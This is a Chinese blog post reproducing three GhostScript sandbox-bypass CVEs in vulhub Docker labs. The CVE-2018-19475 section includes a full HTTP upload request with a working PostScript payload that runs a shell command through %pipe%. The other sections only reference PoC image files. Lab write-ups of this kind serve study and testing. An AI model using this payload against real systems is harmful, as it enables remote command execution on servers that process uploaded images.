vulhub漏洞复现十七_GhostScript

已于 2022-01-28 16:42:26 修改
阅读量923 收藏 1
点赞数 1
文章标签: 安全 web安全
于 2022-01-28 16:17:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122732993
版权

前言

Ghostscript是一套建基于Adobe、PostScript及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件

一、 CVE-2018-16509_GhostScript 沙箱绕过(命令执行)漏洞

漏洞原理

8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞:

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

环境搭建

执行如下命令启动漏洞环境(其中包括最新版 GhostScript 9.23、ImageMagick 7.0.8):

```

docker-compose up -d

```

环境启动后,访问`http://your-ip:8080`将可以看到一个上传组件。

漏洞利用

上传[poc.png](poc.png),将执行命令`id > /tmp/success && cat /tmp/success`。此时进入容器`docker-compose exec web bash`,将可以看到/tmp/success已被创建:

 

 

二、 CVE-2018-19475_GhostScript 沙箱绕过(命令执行)漏洞

漏洞原理

2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。

漏洞环境

执行如下命令启动漏洞环境(其中包括 GhostScript 9.25、ImageMagick 7.0.8-20):

```

docker-compose up -d

```

环境启动后,访问`http://your-ip:8080`将可以看到一个上传组件。

漏洞利用

将POC作为图片上传,执行命令`id > /tmp/success && cat /tmp/success`:

```

POST /index.php HTTP/1.1

Host: target

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO

Content-Length: 279

------WebKitFormBoundaryukZmnyhO

Content-Disposition: form-data; name="file_upload"; filename="1.jpg"

content-Type="image/png"

%!PS

0 1 300367 {} for

{save restore} stopped {} if

(%pipe%id > /tmp/success && cat /tmp/success) (w) file

------WebKitFormBoundaryukZmnyhO--

```

命令已成功执行:

当然,真实环境下通常无法直接回显漏洞执行结果,你需要使用带外攻击的方式来检测漏洞。

三、 CVE-2019-6116_GhostScript 沙箱绕过(命令执行)漏洞

漏洞原理

2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

漏洞环境

执行如下命令启动漏洞环境(其中包括最新版 GhostScript 9.26、ImageMagick 7.0.8-27):

```

docker-compose up -d

```

环境启动后,访问`http://your-ip:8080`将可以看到一个上传组件。

漏洞利用

作者给出了[POC](poc.png),上传这个文件,即可执行`id > /tmp/success`:

也可以用``docker run -it --rm --name uu -v `pwd`/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png``来直接测试poc:

Revenge_scan
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ghostscript_12166.zip
07-27
在这个名为"ghostscript_12166.zip"的压缩包中,包含的主要组件是"gs920w32.exe",这是一个Windows版本的Ghostscript 9.20安装程序。Ghostscript能够解析和渲染这些格式的文档,同时,它还提供了将PDF转换为图像的...
GPL_Ghostscript8.15:PS到PDF的免费驱动,用于PDF打印机
06-24
GPL_Ghostscript8.15:PS到PDF的免费驱动,用于PDF打印机,比如CuteWriter等。 free的软件,不需要序列号和注册。
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)
EC_Carrot的博客
06-06 544
漏洞背景 Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript(一种用于电子产业和桌面出版领域的页面描述语言和编程语言)解析器。该产品可显示Postscript文件以及在非Postscript打印机上打印Postscript文件。 Artifex Software Ghostscript 9.26之前版本中的psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施
buuctf [GhostScript]CVE-2018-19475
qq_1873822的博客
03-30 431
漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 ./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限
Python 渗透测试:GhostScript 沙箱绕过.(CVE-2018-16509)
最新发布
网络安全领域___专研者.
05-20 537
GhostScript 沙箱是一种安全机制,用于在受控环境中运行 GhostScript 解释器,以防止恶意代码的执行。GhostScript 是一个广泛使用的 PDF 和 PostScript 解释器,通常用于在服务器上处理和渲染这些文件格式。但是,GhostScript 也可能存在安全漏洞,攻击者可以利用这些漏洞来执行任意代码。GhostScript 沙箱就是为了解决这个问题而设计的。它将 GhostScript 解释器置于一个受限的执行环境中,限制其访问系统资源的能力。这样可以防止恶意代码在 Ghos
Buuctf [GhostScript]CVE-2018-19475
ch258563的博客
05-30 157
Buuctf [GhostScript]CVE-2018-19475
MS17-010漏洞并尝试在靶机内植入勒索病毒
2301_77441874的博客
06-16 383
作为一个刚刚入圈的小白,闲来无事准备一下永恒之蓝(MS17-010),不多废话直接上货(如果植入破坏性病毒建议给你的镜像来个快照)。
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)
HEAVEN569的博客
06-21 549
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)
PdfShrinker2.0_c#实例_pdf_ghostscript压缩_
10-02
rasterizer.GhostscriptVersionInfo = new GhostscriptVersionInfo("path_to_ghostscript_dll"); try { // 打开PDF文件 rasterizer.Open("input.pdf"); // 创建一个新的PDF文件用于保存压缩结果 using ...
PDF转换图片.zip_Ghostscript pdf_pdf_pdf 转换_pdf转图片 开发
07-15
在IT领域,有一种强大的工具叫做Ghostscript,它可以用来将PDF文件转换成图像格式。本教程将详细讲解如何利用C#编程语言结合Ghostscript实这一功能。 首先,Ghostscript是一个开源的软件库,它提供了处理Post...
gs_for_ arm (ghostscript-9.53.3)
12-17
交叉编译完成测试可用的arm平台gs文件 ◆电脑印表机使用的栅格化影像处理器(RIP) ◆以Postscript和PDF阅览器使用的栅格化影像处理器(RIP) 引擎。...◆GhostScript可从pdf文件中批量提取图片,及把每页pif转换为图片
HTB Hospital——CVE-2023-35001,CVE-2023-2640-CVE-2023-32629,CVE-2023-36664
q
12-17 405
查看htdocs权限,发有system权限,文件夹是system权限的,那么webshell拿到的也应该是system的,上传个web后门进行提权。————本文章仅用于学习记录,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。在c盘看见一个xammp的文件----XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。登录到8080WEB端口,注册一个用户进入发一个文件上传点。
Ghostscript开源PDF库中发关键漏洞
FreeBuf_的博客
07-13 1343
在Linux中广泛使用的PostScript语言和PDF文件开源解释器Ghostscript被发存在严重远程代码执行漏洞。该漏洞被标记为CVE-2023-3664,CVSS v3评级为9.8,影响10.01.2之前的所有Ghostscript版本,10.01.2是三周前发布的最新版本。据Kroll公司的分析师G. Glass和D. Truman称,他们针对该漏洞开发了一个概念验证(PoC)漏洞,在打开恶意特制文件时可触发代码执行。
GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-16509 漏洞
ADummy的博客
02-24 321
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509) by ADummy 0x00利用路线 ​ 构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 ​ 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞: http://seclists.org/oss-sec/2018/q3/142 https://b
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1255
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 过程 这里使用7.0.8版本 使
[春秋云镜]CVE-2018-16509
niubi707的博客
12-02 5307
春秋云镜CVE-2018-16509GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 Python 中处理图片的模块 PIL(Pillow),因为其内部调用了 GhostScript 而受到 CVE-2018-16509的影响
php沙盒绕过,GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)
weixin_30317869的博客
03-21 223
POST /index.php HTTP/1.1Host: targetAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close...
GhostScript 沙箱绕过命令执行漏洞
m0_63241485的博客
08-26 1107
当dorestore退出时,LockFilePermissions的值被设置为falsea = blob;随后使用.setuserparams方法还原LockFilePermissionsa = blob;但是,在restore之后,.setuserparams方法执行之前,可能会抛出StackOverflowError栈溢出错误,不会重置“LockFilePermissions”。从而导致绕过-dSAFER。...
【严重】Artifex Software Ghostscript 任意命令执行漏洞(POC已公开)(CVE-2023-28879)
murphysec的博客
04-18 1322
Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript解析器。 Artifex Ghostscript 10.01.0及之前版本中,如果写入缓冲区的数据比总长度少一个字节,则尝试写入转义字符,导致两个字节被写入。攻击者可通过泄露堆中path_control_active地址,覆写无效字节以禁用沙箱,进而通过PostScript的%pipe%执行任意命令。该漏洞影响 BCPEncode, BCPDecode, TBCPEncode,
ghostscript
01-12
Ghostscript是一个用于处理PostScript和PDF文件的开源软件。它可以解析PostScript和PDF文件,将它们渲染成在屏幕上显示或打印的图像。Ghostscript可以在多个平台上运行,包括Windows、Linux和Mac OS。 用户可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值